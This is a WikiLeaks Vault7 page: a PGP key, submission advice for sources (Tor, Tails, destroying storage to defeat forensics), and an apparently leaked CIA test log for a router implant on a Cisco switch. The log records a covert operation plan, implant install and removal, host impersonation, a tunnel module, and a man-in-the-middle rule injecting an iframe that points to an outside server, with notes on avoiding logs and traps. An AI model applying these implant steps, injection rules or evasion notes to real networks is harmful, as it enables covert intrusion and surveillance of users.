This key's fingerprint is A04C 5E09 ED02 B328 03EB 6116 93ED 732E 9231 8DBA

-----BEGIN PGP PUBLIC KEY BLOCK-----

mQQNBFUoCGgBIADFLp+QonWyK8L6SPsNrnhwgfCxCk6OUHRIHReAsgAUXegpfg0b
rsoHbeI5W9s5to/MUGwULHj59M6AvT+DS5rmrThgrND8Dt0dO+XW88bmTXHsFg9K
jgf1wUpTLq73iWnSBo1m1Z14BmvkROG6M7+vQneCXBFOyFZxWdUSQ15vdzjr4yPR
oMZjxCIFxe+QL+pNpkXd/St2b6UxiKB9HT9CXaezXrjbRgIzCeV6a5TFfcnhncpO
ve59rGK3/az7cmjd6cOFo1Iw0J63TGBxDmDTZ0H3ecQvwDnzQSbgepiqbx4VoNmH
OxpInVNv3AAluIJqN7RbPeWrkohh3EQ1j+lnYGMhBktX0gAyyYSrkAEKmaP6Kk4j
/ZNkniw5iqMBY+v/yKW4LCmtLfe32kYs5OdreUpSv5zWvgL9sZ+4962YNKtnaBK3
1hztlJ+xwhqalOCeUYgc0Clbkw+sgqFVnmw5lP4/fQNGxqCO7Tdy6pswmBZlOkmH
XXfti6hasVCjT1MhemI7KwOmz/KzZqRlzgg5ibCzftt2GBcV3a1+i357YB5/3wXE
j0vkd+SzFioqdq5Ppr+//IK3WX0jzWS3N5Lxw31q8fqfWZyKJPFbAvHlJ5ez7wKA
1iS9krDfnysv0BUHf8elizydmsrPWN944Flw1tOFjW46j4uAxSbRBp284wiFmV8N
TeQjBI8Ku8NtRDleriV3djATCg2SSNsDhNxSlOnPTM5U1bmh+Ehk8eHE3hgn9lRp
2kkpwafD9pXaqNWJMpD4Amk60L3N+yUrbFWERwncrk3DpGmdzge/tl/UBldPoOeK
p3shjXMdpSIqlwlB47Xdml3Cd8HkUz8r05xqJ4DutzT00ouP49W4jqjWU9bTuM48
LRhrOpjvp5uPu0aIyt4BZgpce5QGLwXONTRX+bsTyEFEN3EO6XLeLFJb2jhddj7O
DmluDPN9aj639E4vjGZ90Vpz4HpN7JULSzsnk+ZkEf2XnliRody3SwqyREjrEBui
9ktbd0hAeahKuwia0zHyo5+1BjXt3UHiM5fQN93GB0hkXaKUarZ99d7XciTzFtye
/MWToGTYJq9bM/qWAGO1RmYgNr+gSF/fQBzHeSbRN5tbJKz6oG4NuGCRJGB2aeXW
TIp/VdouS5I9jFLapzaQUvtdmpaeslIos7gY6TZxWO06Q7AaINgr+SBUvvrff/Nl
l2PRPYYye35MDs0b+mI5IXpjUuBC+s59gI6YlPqOHXkKFNbI3VxuYB0VJJIrGqIu
Fv2CXwy5HvR3eIOZ2jLAfsHmTEJhriPJ1sUG0qlfNOQGMIGw9jSiy/iQde1u3ZoF
so7sXlmBLck9zRMEWRJoI/mgCDEpWqLX7hTTABEBAAG0x1dpa2lMZWFrcyBFZGl0
b3JpYWwgT2ZmaWNlIEhpZ2ggU2VjdXJpdHkgQ29tbXVuaWNhdGlvbiBLZXkgKFlv
dSBjYW4gY29udGFjdCBXaWtpTGVha3MgYXQgaHR0cDovL3dsY2hhdGMzcGp3cGxp
NXIub25pb24gYW5kIGh0dHBzOi8vd2lraWxlYWtzLm9yZy90YWxrKSA8Y29udGFj
dC11cy11c2luZy1vdXItY2hhdC1zeXN0ZW1Ad2lraWxlYWtzLm9yZz6JBD0EEwEK
ACcCGwMFCwkIBwMFFQoJCAsFFgIDAQACHgECF4AFAlb6cdIFCQOznOoACgkQk+1z
LpIxjbrlqh/7B2yBrryWhQMGFj+xr9TIj32vgUIMohq94XYqAjOnYdEGhb5u5B5p
BNowcqdFB1SOEvX7MhxGAqYocMT7zz2AkG3kpf9f7gOAG7qA1sRiB+R7mZtUr9Kv
fQSsRFPb6RNzqqB9I9wPNGhBh1YWusUPluLINwbjTMnHXeL96HgdLT+fIBa8ROmn
0fjJVoWYHG8QtsKiZ+lo2m/J4HyuJanAYPgL6isSu/1bBSwhEIehlQIfXZuS3j35
12SsO1Zj2BBdgUIrADdMAMLneTs7oc1/PwxWYQ4OTdkay2deg1g/N6YqM2N7rn1W
7A6tmuH7dfMlhcqw8bf5veyag3RpKHGcm7utDB6k/bMBDMnKazUnM2VQoi1mutHj
kTCWn/vF1RVz3XbcPH94gbKxcuBi8cjXmSWNZxEBsbirj/CNmsM32Ikm+WIhBvi3
1mWvcArC3JSUon8RRXype4ESpwEQZd6zsrbhgH4UqF56pcFT2ubnqKu4wtgOECsw
K0dHyNEiOM1lL919wWDXH9tuQXWTzGsUznktw0cJbBVY1dGxVtGZJDPqEGatvmiR
o+UmLKWyxTScBm5o3zRm3iyU10d4gka0dxsSQMl1BRD3G6b+NvnBEsV/+KCjxqLU
vhDNup1AsJ1OhyqPydj5uyiWZCxlXWQPk4p5WWrGZdBDduxiZ2FTj17hu8S4a5A4
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
J3x7gtxUMkTadELqwY6hrU8=
=BLTH
-----END PGP PUBLIC KEY BLOCK-----
		

Contact

If you need help using Tor you can contact WikiLeaks for assistance in setting it up using our simple webchat available at: https://wikileaks.org/talk

If you can use Tor, but need to contact WikiLeaks for other reasons use our secured webchat available at http://wlchatc3pjwpli5r.onion

We recommend contacting us over Tor if you can.

Tor

Tor is an encrypted anonymising network that makes it harder to intercept internet communications, or see where communications are coming from or going to.

In order to use the WikiLeaks public submission system as detailed above you can download the Tor Browser Bundle, which is a Firefox-like browser available for Windows, Mac OS X and GNU/Linux and pre-configured to connect using the anonymising system Tor.

Tails

If you are at high risk and you have the capacity to do so, you can also access the submission system through a secure operating system called Tails. Tails is an operating system launched from a USB stick or a DVD that aim to leaves no traces when the computer is shut down after use and automatically routes your internet traffic through Tor. Tails will require you to have either a USB stick or a DVD at least 4GB big and a laptop or desktop computer.

Tips

Our submission system works hard to preserve your anonymity, but we recommend you also take some of your own precautions. Please review these basic guidelines.

1. Contact us if you have specific problems

If you have a very large submission, or a submission with a complex format, or are a high-risk source, please contact us. In our experience it is always possible to find a custom solution for even the most seemingly difficult situations.

2. What computer to use

If the computer you are uploading from could subsequently be audited in an investigation, consider using a computer that is not easily tied to you. Technical users can also use Tails to help ensure you do not leave any records of your submission on the computer.

3. Do not talk about your submission to others

If you have any issues talk to WikiLeaks. We are the global experts in source protection – it is a complex field. Even those who mean well often do not have the experience or expertise to advise properly. This includes other media organisations.

After

1. Do not talk about your submission to others

If you have any issues talk to WikiLeaks. We are the global experts in source protection – it is a complex field. Even those who mean well often do not have the experience or expertise to advise properly. This includes other media organisations.

2. Act normal

If you are a high-risk source, avoid saying anything or doing anything after submitting which might promote suspicion. In particular, you should try to stick to your normal routine and behaviour.

3. Remove traces of your submission

If you are a high-risk source and the computer you prepared your submission on, or uploaded it from, could subsequently be audited in an investigation, we recommend that you format and dispose of the computer hard drive and any other storage media you used.

In particular, hard drives retain data after formatting which may be visible to a digital forensics team and flash media (USB sticks, memory cards and SSD drives) retain data even after a secure erasure. If you used flash media to store sensitive data, it is important to destroy the media.

If you do this and are a high-risk source you should make sure there are no traces of the clean-up, since such traces themselves may draw suspicion.

4. If you face legal action

If a legal action is brought against you as a result of your submission, there are organisations that may help you. The Courage Foundation is an international organisation dedicated to the protection of journalistic sources. You can find more details at https://www.couragefound.org.

WikiLeaks publishes documents of political or historical importance that are censored or otherwise suppressed. We specialise in strategic global publishing and large archives.

The following is the address of our secure site where you can anonymously upload your documents to WikiLeaks editors. You can only access this submissions system through Tor. (See our Tor tab for more information.) We also advise you to read our tips for sources before submitting.

wlupld3ptjvsgwqw.onion
Copy this address into your Tor browser. Advanced users, if they wish, can also add a further layer of encryption to their submission using our public PGP key.

If you cannot use Tor, or your submission is very large, or you have specific requirements, WikiLeaks provides several alternative methods. Contact us to discuss how to proceed.

Vault7: CIA Hacking Tools Revealed

Navigation: » Latest version


Owner: User #71467

Cytolysis-1h HG v3.1.6 Delivery

HG v3.1.6 was delivered for Cytolysis on 1/12/16 for SUP720.  Testing scope will include ACE, SMITE and Tunnel.

CONOP will be:

  • Hop through 3 flux nodes - 1 internet, 1 osmo subnet, 1 admin mgmt subnet - and IACInternational Access Code attack VLANVirtual Local Area Network 1 IP of target - XXX.XXX.X.XXX (TOPWAY-NET[CN])
  • Trigger port will be UDPUser Datagram Protocol 161, host to impersonate will be explicitly set to a host not on VLANVirtual Local Area Network 10 or VLANVirtual Local Area Network 2
  • Establish CTCounter Terrorism session over HTTPSHypertext Transfer Protocol Secure back through flux node 4
  • Use ACEApplication Control Engine (Module) commands to verify state of the device
  • Use socket get_arp_survey_data and output of "show ip nat trans" to survey traffic from VLANVirtual Local Area Network 19
  • SMITE hosts on target customer network - VLANVirtual Local Area Network 19
  • Use Tunnel to appear as if Operator is on VLANVirtual Local Area Network other than VLANVirtual Local Area Network 19 or VLANVirtual Local Area Network 2, and from there, nmap VLANVirtual Local Area Network 19.

Testing Summary

  • Note in test report that module 2 is in state PwrDown and should be verified before proceeding
  • Trigger packets that go through the target due to HG trigger sequence mis match will be caught and logged by outbound customer ACLs potentially - we will trigger to IP of device on port UDPUser Datagram Protocol 161.  If trigger packets have incorrect sequence number, an encoding error will increment as shown in output of "show snmp".
  • Comms packets are SSLv3 - need to consider if this is noticeable on this network
  • Hardware difference between test device and target - daughter card on 4 port 10G line card.  This hardware difference has been accepted.
  • 5 sec CPU spikes to 55-65% during IACInternational Access Code attack, spike to 27% during HG install
  • HG Consumes ~3.5M of Memory, visible in output out show mem
  • Operator must manually start Tunnel module to use the tunnel capability
  • Assists cause observeable in ouput of show ip cef <IP> - this is a known issue.
  • Observed the following print even without HG installed when using Windex to exploit a target client:
    Jan 20 00:39:05.284 C6506: %SEC-6-IPACCESSLOGP: list Customer-2-filter-in denied tcp XXX.XXX.X.XX (TOPWAY-NET[CN])(1132) (Vlan19 0050.5688.c5e6) -> X.X.X.XX (LVLT-GOGL-8-8-8[US])(7777), 1 packet

Testing Notes

  1. Install
    -Memory at start of test:
    cytolysis-1#show mem
    Head Total(b) Used(b) Free(b) Lowest(b) Largest(b)
    Processor 453ACAF0 381990160 101796608 280193552 276504440 218810732
    I/O 8000000 67108864 13902404 53206460 53130184 53130428

    -attacked with IACInternational Access Code via flux
    -CPU hit a peak of 56% during IACInternational Access Code attack
    -Uploaded HG - show mem after install
    cytolysis-1#show mem
    Head Total(b) Used(b) Free(b) Lowest(b) Largest(b)
    Processor 453ACAF0 381990160 105273148 276717012 275964416 216779752
    I/O 8000000 67108864 13902404 53206460 53130184 53130428

    CPU hit one peak of 15% during install
    Used an interpacket delay of .1 for remote

    -Seeds traffic has been running
    -Established CTCounter Terrorism session impersonating XXX.XXX.X.XX (TOPWAY-NET[CN])
    -success! confirmed that XXX.XXX.X.XX (TOPWAY-NET[CN]) can still browse
    [XXX.XXX.X.XX (TOPWAY-NET[CN])]> packet get_assist_threshold_status
    [Success]
    Maximum Packets Per Second: 1500
    Number of Packets Counted Per Sample: 3000
    Highest Observed Packets Per Second: 173
    Number of Overflows Since Settings Last Changed: 0
    Time of Last Overflow: --
    ************ Success ************
    [packet get_assist_threshold_status]
    -no log messages or snmp traps observed, cpu normal
    *will want to impersonate a host that is not very busy, since an assist will be laid down for that host
    cytolysis-1#show ip cef XXX.XXX.X.XX (TOPWAY-NET[CN])
    XXX.XXX.X.XX (TOPWAY-NET[CN])/32
    receive
    cytolysis-1#
    -Quit the CTCounter Terrorism session and confirmed that after about 10 seconds, the RAA dropped:
    cytolysis-1#show ip cef XXX.XXX.X.XX (TOPWAY-NET[CN])
    XXX.XXX.X.XX (TOPWAY-NET[CN])/32
    attached to Vlan3
    cytolysis-1#

  2. Uninstall

    -Re-established CTCounter Terrorism session, this time impersonating XXX.XXX.X.XX (TOPWAY-NET[CN]). No seeds currently running on that host.
    -Entered device uninstall-hg -mp -f to uninstall HG
    -no syslog or snmp trap observed
    -CPU from device after uninstall
    cytolysis-1# show proc cpu hist


    22222 44444 1111144444
    100
    90
    80
    70
    60
    50
    40
    30
    20
    10
    0....5....1....1....2....2....3....3....4....4....5....5....
    0 5 0 5 0 5 0 5 0 5
    CPU% per second (last 60 seconds)

    1 1 1 1 1 1 1
    0565955565466568566596566691570777976644965686666586545555
    100
    90
    80
    70
    60
    50
    40
    30
    20 * * *
    10 ************************************** ************* ****
    0....5....1....1....2....2....3....3....4....4....5....5....
    0 5 0 5 0 5 0 5 0 5
    CPU% per minute (last 60 minutes)
    * = maximum CPU% # = average CPU%

    521121211212212111212222211242112111211112122
    606719379081263898081510099121890987289981916
    100
    90
    80
    70
    60 *
    50 *
    40 * *
    30 * * * *
    20 *********************************************
    10 *********************************************
    0....5....1....1....2....2....3....3....4....4....5....5....6....6....7.
    0 5 0 5 0 5 0 5 0 5 0 5 0
    CPU% per hour (last 72 hours)
    * = maximum CPU% # = average CPU%

    cytolysis-1#
    cytolysis-1#show mem
    Head Total(b) Used(b) Free(b) Lowest(b) Largest(b)
    Processor 453ACAF0 381990160 101863176 280126984 275964416 218810732
    I/O 8000000 67108864 13902404 53206460 53130184 53130428

    RAA for impsonated host from CTCounter Terrorism session has dropped

    cytolysis-1#show ip cef XXX.XXX.X.XX (TOPWAY-NET[CN])
    XXX.XXX.X.XX (TOPWAY-NET[CN])/32
    attached to Vlan3
    cytolysis-1#

  3. Modularity

    -Reloaded DUTDevice Under Test to start with a clean device
    -Flux nodes up, Seeds running on VLANVirtual Local Area Network 19
    -IAC attacked and uploaded HG
    -Established CTCounter Terrorism connection with XXX.XXX.X.XX (TOPWAY-NET[CN]) as impersonated host, no punch-throughs of traffic to impersonated host
    -Confirmed that impersonated host is still able to browse, did not observe any syslogs or traps sent by DUT
    -Stop/Start/Restarted ACEApplication Control Engine (Module) module - verified functionality after each start
    -Testing FB modularity and functionality with smite. Started up Victim3 VMVirtual Machine and web browsed with no rules active and saw the following print:

    Jan 19 19:03:08.193 C6506: %SEC-6-IPACCESSLOGP: list Core-Net-filter-in denied tcp X.X.X.XX (LVLT-GOGL-8-8-8[US])(80) (Vlan2 0015.fa80.efbf) -> 10.11.0.13(2213), 1 packetC
    - Added a rule for SMITE and saw the following
    cytolysis-1#show ip cef 10.11.0.13
    10.11.0.13/32
    attached to Vlan19
    cytolysis-1#
    Jan 19 19:09:02.877 C6506: %SEC-6-IPACCESSLOGP: list Core-Net-filter-in denied tcp X.X.X.XX (LVLT-GOGL-8-8-8[US])(80) (Vlan2 0015.fa80.efbf) -> 10.11.0.13(2213), 6 packets
    -successfully SMITE'd 3 more times with no prints
    -restarting FB
    -no rules active, browsed from victim, cleared cache and went to all 3 web servers 10x, no prints
    -activated SMITE rule and ran 7 times - then saw the following prints:

    Jan 19 20:02:55.049 C6506: %SEC-6-IPACCESSLOGP: list Customer-2-filter-in denied tcp XXX.XXX.X.XX (TOPWAY-NET[CN])(1041) (Vlan19 0050.5688.c5e6) -> X.X.X.XX (LVLT-GOGL-8-8-8[US])(7777), 1 packet
    Jan 19 20:08:04.769 C6506: %SEC-6-IPACCESSLOGP: list Customer-2-filter-in denied tcp XXX.XXX.X.XX (TOPWAY-NET[CN])(1041) (Vlan19 0050.5688.c5e6) -> X.X.X.XX (LVLT-GOGL-8-8-8[US])(7777), 7 packets
    Jan 19 20:09:04.801 C6506: %SEC-6-IPACCESSLOGP: list Core-Net-filter-in denied udp 10.9.8.22(137) (Vlan2 0021.d80d.cfc1) -> XXX.XXX.X.XX (TOPWAY-NET[CN])(137), 3 packets
    Jan 19 20:13:04.929 C6506: %SEC-6-IPACCESSLOGP: list Customer-2-filter-in denied tcp XXX.XXX.X.XX (TOPWAY-NET[CN])(1041) (Vlan19 0050.5688.c5e6) -> X.X.X.XX (LVLT-GOGL-8-8-8[US])(7777), 2 packets
    Jan 19 20:18:05.093 C6506: %SEC-6-IPACCESSLOGP: list Customer-2-filter-in denied tcp XXX.XXX.X.XX (TOPWAY-NET[CN])(1041) (Vlan19 0050.5688.c5e6) -> X.X.X.XX (LVLT-GOGL-8-8-8[US])(7777), 3 packetsC

  4. Testing SMITE
    1. Starting over with Debian 8.2.  Installed ICON on TR, setup flux, cleaned DUT
    2. Restarted Victim 3 - web browsed 15 times to all three web servers and observed no prints
    3. Web browsed directly to iframe url 15 times and observed no prints
    4. Attacked with IACInternational Access Code and uploaded HG from new ICON 8.2 VMVirtual Machine - impersonating XXX.XXX.X.XX (TOPWAY-NET[CN])
    5. Restarted victim 3.  web browsed 15 times to all three web servers - no prints observed
    6. Web browsed directly to iframe url 15 times in a row - after the 10th try, observed the following:

      cytolysis-1#
      Jan 20 00:39:05.284 C6506: %SEC-6-IPACCESSLOGP: list Customer-2-filter-in denied tcp XXX.XXX.X.XX (TOPWAY-NET[CN])(1132) (Vlan19 0050.5688.c5e6) -> X.X.X.XX (LVLT-GOGL-8-8-8[US])(7777), 1 packet

    7. cytolysis-1#show access-list Customer-2-filter-in
      Extended IP access list Customer-2-filter-in
      10 permit tcp 10.11.0.0 0.0.0.255 host XXX.XXX.X.XX (TOPWAY-NET[CN]) eq 123
      20 permit udp 10.11.0.0 0.0.0.255 host XXX.XXX.X.XX (TOPWAY-NET[CN]) eq ntp
      30 permit icmp any host 10.11.0.1 (5870 matches)
      40 deny ip any 10.11.0.0 0.0.0.255 log-input
      50 permit icmp any host XXX.XXX.X.XX (TOPWAY-NET[CN])
      60 permit icmp any host XXX.XXX.X.XXX (TOPWAY-NET[CN])
      70 permit icmp any host XXX.XXX.X.XX (TOPWAY-NET[CN])
      80 permit icmp any host XXX.XXX.X.XXX (TOPWAY-NET[CN])
      90 deny ip any host XXX.XXX.X.XX (TOPWAY-NET[CN]) log-input
      100 deny ip any XXX.XXX.X.XX (TOPWAY-NET[CN]) 0.0.0.31 log-input
      110 deny ip any host XXX.XXX.X.XX (TOPWAY-NET[CN]) log-input
      120 deny ip any host XXX.XXX.X.XXX (TOPWAY-NET[CN]) log-input
      130 permit tcp 10.11.0.0 0.0.0.255 any eq smtp log-input
      140 permit tcp 10.11.0.0 0.0.0.255 any eq 135 log-input
      150 permit tcp 10.11.0.0 0.0.0.255 any eq 137 log-input
      160 permit tcp 10.11.0.0 0.0.0.255 any eq 139 log-input
      170 permit ip 10.11.0.0 0.0.0.255 any (22022 matches)
      180 deny ip any any log-input (1 match)
      cytolysis-1#

  5. Characterization of print observed while browsing to windex server
    1. Collecting VLANVirtual Local Area Network 19 packet capture during print message
    2. set logging interval and threshold on DUTDevice Under Test so that logs will be seen immediately
    3. Set up span port for vlan 2 and vlan 19 on DUTDevice Under Test and collecting on the DC from g1/1
    4. Stopped the seeds traffic from cust2 to minimize output in wireshark
    5. Ran manual browses from target client to iframe url - took about ten tries, but I got the print and saved off the information that xetron had requested.
    6. Wiping HG, reload DUT, reload target.  Going to confirm once more that I really never get this print without HG by trying more times.
    7. Performed 30 browses to iframe url and no print.  Also browsed at least 30 times to other three web servers, no print
    8. Added HG, still no seeds, no CTCounter Terrorism session.  Repeating step g.  Observed print on the 24th iteration:

      Jan 22 00:22:01.499 C6506: %SEC-6-IPACCESSLOGP: list Customer-2-filter-in denied tcp XXX.XXX.X.XX (TOPWAY-NET[CN])(1262) (Vlan19 0050.5688.c5e6) -> X.X.X.XX (LVLT-GOGL-8-8-8[US])(7777), 1 packet

    9. Going to see if this occurs more during SMITE rule

    10. Established CTCounter Terrorism session and created smite rule:

      mitm create http_iframe 10.11.0.13 255.255.255.255 0 0 X.X.X.XX (LVLT-GOGL-8-8-8[US]) 255.255.255.255 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -bk -bc -en

    11. Observed prints with SMITE rule active as well at about the same rate

    12. Uninstalled and rebooted DUT
    13. Installed original version of delivery 3.1.5.
    14. Also working in installing newest version of windex in TR
    15. Was able to browse to iframe url 30 times from client wiht v3.1.5 and saw no prints.  however overnight, i had left the browser window open and windex session connected and at 4am, the router did log some messages:
    16. Jan 22 04:42:37.120 C6506: %SEC-6-IPACCESSLOGP: list Customer-2-filter-in denied tcp XXX.XXX.X.XX (TOPWAY-NET[CN])(1122) (Vlan19 0050.5688.c5e6) -> X.X.X.XX (LVLT-GOGL-8-8-8[US])(7777), 1 packet
      Jan 22 04:42:37.120 C6506: %SEC-6-IPACCESSLOGP: list Customer-2-filter-in denied tcp XXX.XXX.X.XX (TOPWAY-NET[CN])(1122) (Vlan19 0050.5688.c5e6) -> X.X.X.XX (LVLT-GOGL-8-8-8[US])(7777), 1 packet
      Jan 22 04:42:50.120 C6506: %SEC-6-IPACCESSLOGP: list Core-Net-filter-in denied udp 10.9.8.22(137) (Vlan2 0021.d80d.cfc1) -> XXX.XXX.X.XX (TOPWAY-NET[CN])(137), 1 packet
      Jan 22 04:42:51.636 C6506: %SEC-6-IPACCESSLOGP: list Core-Net-filter-in denied udp 10.9.8.22(137) (Vlan2 0021.d80d.cfc1) -> XXX.XXX.X.XX (TOPWAY-NET[CN])(137), 1 packet

    17. After attempting another 30 times without HG, I did reproduce the error message without HG.  This may just be a Windex/IOS NATNetwork Address Translation issue.  Hopefully this issue will be resolved in the newer version of Windex.
  6. Testing Modularity
    1. Reloaded DUT
    2. CPU spike to 66% during IACInternational Access Code attack, 27% duing IACInternational Access Code install, 11% duing CTCounter Terrorism session establishment
    3. Already tested FB and ACEApplication Control Engine (Module) in previous test 3
    4. Testing Tunnel - Note that Tunnel module is not started by default.  Operator will have to start Tunnel module with "module start CovertTunnel.mod" command
    5. Started tunnel mod.  Then stopped it with module stop Tunnel.  Repeated three more times.
    6. Was unable to restart it at first, but after enough time passed and i entered ilm refresh, it did restart successfully.  no syslogs or traps observed, no impact to CPU.
  7. HTTPS Comms testing
    1. Testing the functionality of impersonating different hosts
      1. impersonated XXX.XXX.X.XX (TOPWAY-NET[CN]) - successful connection.  RAA laid down.  Confirmed that host is still able to browse.  No syslogs or traps.
      2. Exited that session and impersonated another host - XXX.XXX.X.XX (TOPWAY-NET[CN]) - this IP is on the VLANVirtual Local Area Network interface - vlan 3 for customer 1.  Successfully connected, rx adj in place for .81, however it is always in place.  Can ping from router to 1.1.1.1 with source address of XXX.XXX.X.XX (TOPWAY-NET[CN]).  Packet assist threshold not increasing with small amount of traffic.
      3. Collected wireshark of HTTPSHypertext Transfer Protocol Secure comms establishment
      4. Tested impersonation of a host on a different vlan - tried vlan 2 10.11.0.10 although this is not recommeded - cx successful and was still able to browse from 10.11.0.10.  Observed these prints though

        Jan 29 00:48:33.410 C6506: %SEC-6-IPACCESSLOGP: list Core-Net-filter-in denied tcp 100.100.40.3(80) (Vlan2 0021.d80d.cfc1) -> 10.11.0.10(36901), 1 packet
        Jan 29 00:48:34.410 C6506: %SEC-6-IPACCESSLOGP: list Core-Net-filter-in denied tcp 100.100.40.3(80) (Vlan2 0021.d80d.cfc1) -> 10.11.0.10(36901), 1 packet

      5. Tested XXX.XXX.X.XX (TOPWAY-NET[CN]) - a non existent host - cx successful as long as the IP was routed back to the device through the network properly

      6. No prints or traps observed duirng cx
      7. Tested connecting impersonating host on vlan 48 - success - still able to browse from impersonated host, no logs or traps.  Assist was laid down and then dropped when CTCounter Terrorism was disconnected.
      8. Testing sending wrong trigger sequence - current seq is 21
